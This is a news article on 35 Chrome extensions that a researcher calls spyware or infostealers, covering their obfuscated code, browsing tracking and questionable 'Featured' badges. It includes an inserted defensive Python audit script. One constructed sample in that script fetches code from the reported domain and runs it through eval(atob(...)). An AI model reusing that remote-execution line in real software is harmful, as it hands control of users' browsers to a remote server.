Security researcher claims 35 Chrome extensions with 4,000,000+ installs 'include some kind of spyware or infostealer'

(Image: Google Chrome logo. Image credit: Anadolu Agency via Getty Images)

You'd be forgiven for thinking that if you downloaded a Google Chrome extension from the official Chrome Web Store, it was likely to be above board. Not so, according to the founder of browser extension security platform Secure Annex, who claims he's identified 35 Chrome extensions with 4 million total installs that he concludes 'include some kind of spyware or infostealer.'

The accused extensions have several things in common. They use many of the same code patterns, connect to many of the same servers, and require the same system permissions (via Ars Technica). However, John Tuckner, founder of cybersecurity firm Secure Annex, also found they use obfuscated code that looks designed to conceal their behaviour.

"These extensions have some strong relations and most claim to actually perform some purpose like ad blocking, extension protection, better search results, or privacy protection which likely keeps them available in the web store", says Tuckner.

"While all are different, the code for their claimed purpose is often very minimal or missing entirely."

In the case of one particular example, Fire Shield Extension Protection, running it on a lab device resulted in a blank webpage, while clicking the options menu appeared to do nothing. Chrome developer tools revealed that the extension connected to a URL and performed a generic "browser_action_clicked" response, but nothing further.

(Image: the Google Chrome logo shown on a smartphone display, Berlin, April 22, 2020. Image credit: Getty Images. Thomas Trutschel/Photothek)

Using a unique extension ID found on GitHub, Tuckner was able to observe Fire Shield sending a variety of events to a web server, tracking what websites he was visiting, which he had visited previously, and the size of his display.

"While I could not find an instance of the [Fire Shield] extension exfiltrating credentials, this level of obfuscation alone, the ability for the extension’s configuration to be remotely controlled, and the capabilities in the browser extension’s code is enough for me to come to the same conclusion that all of these extensions include some kind of spyware or infostealer," says Tuckner.

Tuckner says that he identified 35 extensions using "eerily similar names" and with distinct similarities. 34 of them reference a mysterious "unknow.com" in their background service listings.
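As an added illustration, not code from Tuckner or Secure Annex, the script below audits unpacked Chrome extensions for the traits the report describes: a background script that references the reported domain, obfuscation markers, and broad browsing permissions. The permission list and obfuscation markers are assumed heuristics, and the two sample extensions are constructed for the example.

```python
import json
import re
from pathlib import Path

# Indicator from the report: 34 of the 35 extensions reference this domain in
# their background service listing. Everything else below is an assumed heuristic.
SUSPECT_DOMAINS = ("unknow.com",)
# Assumed: permissions that let an extension observe browsing broadly.
BROAD_PERMISSIONS = {"tabs", "webRequest", "webNavigation", "cookies", "scripting", "<all_urls>"}
# Assumed: common markers of code that hides what it does.
OBFUSCATION_MARKERS = re.compile(r"\beval\(|new Function\(|\batob\(|\\x[0-9a-fA-F]{2}")


def audit_extension(manifest, sources):
    """Audit one unpacked extension. `sources` maps file name -> file text."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    background = manifest.get("background", {})
    bg_files = [background["service_worker"]] if "service_worker" in background else list(background.get("scripts", []))
    findings = []
    for name in bg_files:
        src = sources.get(name, "")
        for domain in SUSPECT_DOMAINS:
            if domain in src:
                findings.append(f"{name} references {domain}")
        if OBFUSCATION_MARKERS.search(src):
            findings.append(f"{name} contains obfuscation markers")
    broad = sorted(perms & BROAD_PERMISSIONS)
    if broad:
        findings.append("broad permissions: " + ", ".join(broad))
    # Flag only when a cluster indicator or obfuscation coincides with broad access.
    suspicious = bool(broad) and any("references" in f or "obfuscation" in f for f in findings)
    return {"name": manifest.get("name", "?"), "findings": findings, "suspicious": suspicious}


def audit_profile(extensions_dir):
    """Walk <profile>/Extensions/<id>/<version>/manifest.json and audit each extension."""
    results = []
    for manifest_path in Path(extensions_dir).glob("*/*/manifest.json"):
        folder = manifest_path.parent
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        sources = {p.relative_to(folder).as_posix(): p.read_text(encoding="utf-8", errors="ignore")
                   for p in folder.rglob("*.js")}
        results.append(audit_extension(manifest, sources))
    return results


# Constructed samples, not real extensions.
SAMPLE_SUSPECT = ({"name": "Example Shield", "manifest_version": 3,
                   "permissions": ["tabs", "storage", "webNavigation"],
                   "host_permissions": ["<all_urls>"],
                   "background": {"service_worker": "bg.js"}},
                  {"bg.js": 'fetch("https://unknow.com/config").then(r=>r.text()).then(t=>eval(atob(t)));'})
SAMPLE_BENIGN = ({"name": "Tab Counter", "manifest_version": 3, "permissions": ["tabs"],
                  "background": {"service_worker": "bg.js"}},
                 {"bg.js": "chrome.tabs.query({}, t => chrome.action.setBadgeText({text: String(t.length)}));"})

if __name__ == "__main__":
    for manifest, sources in (SAMPLE_SUSPECT, SAMPLE_BENIGN):
        print(audit_extension(manifest, sources))
```

Point `audit_profile` at a Chrome profile's `Extensions` directory to run the same checks over everything installed; a hit only means the extension deserves a closer look, not that it is malicious.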

All but one of the identified extensions are unlisted, meaning that you'd have to click on a link directly to go to its Chrome store page. Nevertheless, 10 of the accused extensions are given the "Featured" badge by Google. As Tuckner opines:


"Why are some of these extensions selected to be 'Featured' by Google when they are not discoverable by normal users?

"This blows my mind. Any normal user might interpret that status as the extension being verified and reputable. It should absolutely not be possible to be 'Featured' and not discoverable at the same time."

Indeed. You can find the full list of extensions identified by Tuckner as potentially malicious at the bottom of the Ars Technica article. Many of them have names like Incognito Shield, Privacy Guard, and Total Safety, so if you're using a Chrome extension to protect your online presence, it's worth taking a look to see if you have some serious cleaning up to do.

Andy Edser
Hardware Writer

